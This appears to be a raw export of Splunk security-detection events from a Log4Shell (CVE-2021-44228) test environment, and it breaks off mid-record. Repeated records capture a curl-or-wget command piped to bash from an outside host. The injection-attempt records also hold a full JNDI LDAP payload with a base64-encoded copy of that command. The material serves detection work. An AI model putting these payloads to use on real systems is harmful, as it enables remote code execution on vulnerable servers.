annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633812", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:12", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7870", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642646616, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress 
Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631700", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:35:00", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7798", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. 
This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642646616, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631700", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:35:00", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7798", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", 
savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642646355, search_name="ESCU - Detect Outbound LDAP Traffic - Rule", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 12\",\"CIS 13\"],\"context\":[\"Source:Endpoint\",\"Stage:Initial Access\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Command and Control\",\"Actions on Objectives\"],\"mitre_attack\":[\"T1190\",\"T1059\"],\"nist\":[\"PR.DS\",\"PR.PT\",\"DE.AE\",\"DE.CM\"],\"observable\":[]}", annotations._all="DE.CM", annotations._all="Command and Control", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Actions on Objectives", annotations._all="CIS 12", annotations._all="Source:Endpoint", annotations._all="DE.AE", annotations._all="CVE-2021-44228", annotations._all="T1059", annotations._all="PR.PT", annotations._all="T1190", annotations._all="PR.DS", annotations._all="Stage:Initial Access", annotations._all="CIS 13", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 12", annotations.cis20="CIS 13", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Command and Control", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1190", annotations.mitre_attack="T1059", annotations.nist="PR.DS", annotations.nist="PR.PT", 
annotations.nist="DE.AE", annotations.nist="DE.CM", dest_ip="0:0:0:0:0:ffff:a00:110", earliest_time="2022-01-19T22:34:59", info_max_time="+Infinity", info_min_time="0.000", latest_time="2022-01-20T00:21:41", risk_message="An outbound LDAP connection from 0:0:0:0:0:ffff:a00:114 in your infrastructure connecting to dest ip 0:0:0:0:0:ffff:a00:110", risk_object="0:0:0:0:0:ffff:a00:110", risk_object_type="system", risk_score="56.0", savedsearch_description="Malicious actors often abuse misconfigured LDAP servers or applications that use the LDAP servers in organizations. Outbound LDAP traffic should not be allowed outbound through your perimeter firewall. This search will help determine if you have any LDAP connections to IP addresses outside of private (RFC1918) address space.", src_ip="0:0:0:0:0:ffff:a00:114" 1642646355, search_name="ESCU - Detect Outbound LDAP Traffic - Rule", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 12\",\"CIS 13\"],\"context\":[\"Source:Endpoint\",\"Stage:Initial Access\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Command and Control\",\"Actions on Objectives\"],\"mitre_attack\":[\"T1190\",\"T1059\"],\"nist\":[\"PR.DS\",\"PR.PT\",\"DE.AE\",\"DE.CM\"],\"observable\":[]}", annotations._all="DE.CM", annotations._all="Command and Control", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Actions on Objectives", annotations._all="CIS 12", annotations._all="Source:Endpoint", annotations._all="DE.AE", annotations._all="CVE-2021-44228", annotations._all="T1059", annotations._all="PR.PT", annotations._all="T1190", annotations._all="PR.DS", annotations._all="Stage:Initial Access", annotations._all="CIS 13", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", 
annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 12", annotations.cis20="CIS 13", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Command and Control", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1190", annotations.mitre_attack="T1059", annotations.nist="PR.DS", annotations.nist="PR.PT", annotations.nist="DE.AE", annotations.nist="DE.CM", dest_ip="0:0:0:0:0:ffff:a00:110", earliest_time="2022-01-19T22:34:59", info_max_time="+Infinity", info_min_time="0.000", latest_time="2022-01-20T00:21:41", risk_message="An outbound LDAP connection from 0:0:0:0:0:ffff:a00:114 in your infrastructure connecting to dest ip 0:0:0:0:0:ffff:a00:110", risk_object="0:0:0:0:0:ffff:a00:114", risk_object_type="system", risk_score="56.0", savedsearch_description="Malicious actors often abuse misconfigured LDAP servers or applications that use the LDAP servers in organizations. Outbound LDAP traffic should not be allowed outbound through your perimeter firewall. 
This search will help determine if you have any LDAP connections to IP addresses outside of private (RFC1918) address space.", src_ip="0:0:0:0:0:ffff:a00:114" 1642646352, search_name="ESCU - Log4Shell JNDI Payload Injection Attempt - Rule", action="Bad Request", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 3\",\"CIS 5\",\"CIS 16\"],\"context\":[\"Source:Application Log\",\"Stage:Execution\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Reconnaissance\",\"Exploitation\"],\"mitre_attack\":[\"T1190\"],\"nist\":[\"DE.CM\"],\"observable\":[]}", annotations._all="CIS 5", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CIS 3", annotations._all="DE.CM", annotations._all="Stage:Execution", annotations._all="CIS 16", annotations._all="Source:Application Log", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._all="T1190", annotations._all="Reconnaissance", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 3", annotations.cis20="CIS 5", annotations.cis20="CIS 16", annotations.context="Source:Application Log", annotations.context="Stage:Execution", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Reconnaissance", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1190", annotations.nist="DE.CM", category="application/json", count="2", dest="10.0.1.21", dest_port="80", http_content_type="application/json", http_method="GET", http_referrer="unknown", http_user_agent="curl/7.79.1", info_max_time="+Infinity", info_min_time="0.000", risk_message="CVE-2021-44228 Log4Shell triggered for host 10.0.1.21", risk_object="10.0.1.21", 
risk_object_type="system", risk_score="15.0", savedsearch_description="CVE-2021-44228 Log4Shell payloads can be injected via various methods, but one of the most common injection vectors is via Web calls. Many of the vulnerable java web applications that are using log4j have a web component to them and are especially targets of this injection, specifically projects like Apache Struts, Flink, Druid, and Solr. The exploit is triggered by a LDAP lookup function in the log4j package, its invocation is similar to `${jndi:ldap://PAYLOAD_INJECTED}`, when executed against vulnerable web applications the invocation can be seen in various parts of web logs. Specifically it has been successfully exploited via headers like X-Forwarded-For, User-Agent, Referer, and X-Api-Version. In this detection we first limit the scope of our search to the Web Datamodel and use the `| from datamodel` function to benefit from schema accelerated searching capabilities, mainly because the second part of the detection is pretty heavy, it runs a regex across all _raw events that looks for `${jndi:ldap://` pattern across all potential web fields available to the raw data, like http headers for example. 
If you see results for this detection, it means that there was an attempt at an injection, which could be a reconnaissance activity or a valid exploitation attempt, but this does not exactly mean that the host was indeed successfully exploited.", site="localhost", src="${jndi:ldap://10.0.1.16:1389/Basic/Command/Base64/KGN1cmwgaHR0cDovLzguOC44Ljg6ODAvd3AtY29udGVudC90aGVtZXMvdHdlbnR5dGhpcnRlZW4vbTggfHwgd2dldCAtcU8gLSBodHRwOi8vOC44LjguODo4MC93cC1jb250ZW50L3RoZW1lcy90d2VudHl0aGlydGVlbi9tOCl8YmFzaA==}", url="http://10.0.1.21:80/", url_domain="10.0.1.21", user="unknown" 1642646352, search_name="ESCU - Log4Shell JNDI Payload Injection Attempt - Rule", action="Bad Request", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 3\",\"CIS 5\",\"CIS 16\"],\"context\":[\"Source:Application Log\",\"Stage:Execution\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Reconnaissance\",\"Exploitation\"],\"mitre_attack\":[\"T1190\"],\"nist\":[\"DE.CM\"],\"observable\":[]}", annotations._all="CIS 5", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CIS 3", annotations._all="DE.CM", annotations._all="Stage:Execution", annotations._all="CIS 16", annotations._all="Source:Application Log", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._all="T1190", annotations._all="Reconnaissance", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 3", annotations.cis20="CIS 5", annotations.cis20="CIS 16", annotations.context="Source:Application Log", annotations.context="Stage:Execution", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Reconnaissance", 
annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1190", annotations.nist="DE.CM", category="application/json", count="2", dest="10.0.1.21", dest_port="80", http_content_type="application/json", http_method="GET", http_referrer="unknown", http_user_agent="curl/7.79.1", info_max_time="+Infinity", info_min_time="0.000", risk_message="CVE-2021-44228 Log4Shell triggered for host 10.0.1.21", risk_object="unknown", risk_object_type="user", risk_score="15.0", savedsearch_description="CVE-2021-44228 Log4Shell payloads can be injected via various methods, but one of the most common injection vectors is via Web calls. Many of the vulnerable java web applications that are using log4j have a web component to them and are especially targets of this injection, specifically projects like Apache Struts, Flink, Druid, and Solr. The exploit is triggered by a LDAP lookup function in the log4j package, its invocation is similar to `${jndi:ldap://PAYLOAD_INJECTED}`, when executed against vulnerable web applications the invocation can be seen in various parts of web logs. Specifically it has been successfully exploited via headers like X-Forwarded-For, User-Agent, Referer, and X-Api-Version. In this detection we first limit the scope of our search to the Web Datamodel and use the `| from datamodel` function to benefit from schema accelerated searching capabilities, mainly because the second part of the detection is pretty heavy, it runs a regex across all _raw events that looks for `${jndi:ldap://` pattern across all potential web fields available to the raw data, like http headers for example. 
If you see results for this detection, it means that there was an attempt at an injection, which could be a reconnaissance activity or a valid exploitation attempt, but this does not exactly mean that the host was indeed successfully exploited.", site="localhost", src="${jndi:ldap://10.0.1.16:1389/Basic/Command/Base64/KGN1cmwgaHR0cDovLzguOC44Ljg6ODAvd3AtY29udGVudC90aGVtZXMvdHdlbnR5dGhpcnRlZW4vbTggfHwgd2dldCAtcU8gLSBodHRwOi8vOC44LjguODo4MC93cC1jb250ZW50L3RoZW1lcy90d2VudHl0aGlydGVlbi9tOCl8YmFzaA==}", url="http://10.0.1.21:80/", url_domain="10.0.1.21", user="unknown" 1642646316, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638231", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:23:51", parent_process_id="8018", parent_process_name="dash", process="wget -qO - 
http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="8020", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642646316, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638231", info_max_time="+Infinity", info_min_time="0.000", 
lastTime="2022-01-20T00:23:51", parent_process_id="8018", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="8020", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642646316, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", 
dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633944", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:24", parent_process_id="7877", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7879", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642646316, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", 
annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633944", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:24", parent_process_id="7877", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7879", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642646316, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", 
annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633942", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:22", parent_process_id="7870", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7872", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642646316, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", 
annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633942", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:22", parent_process_id="7870", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7872", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. 
This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642646316, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631831", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:37:11", parent_process_id="7798", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7799", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies 
the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642646316, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631831", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:37:11", parent_process_id="7798", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7799", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", 
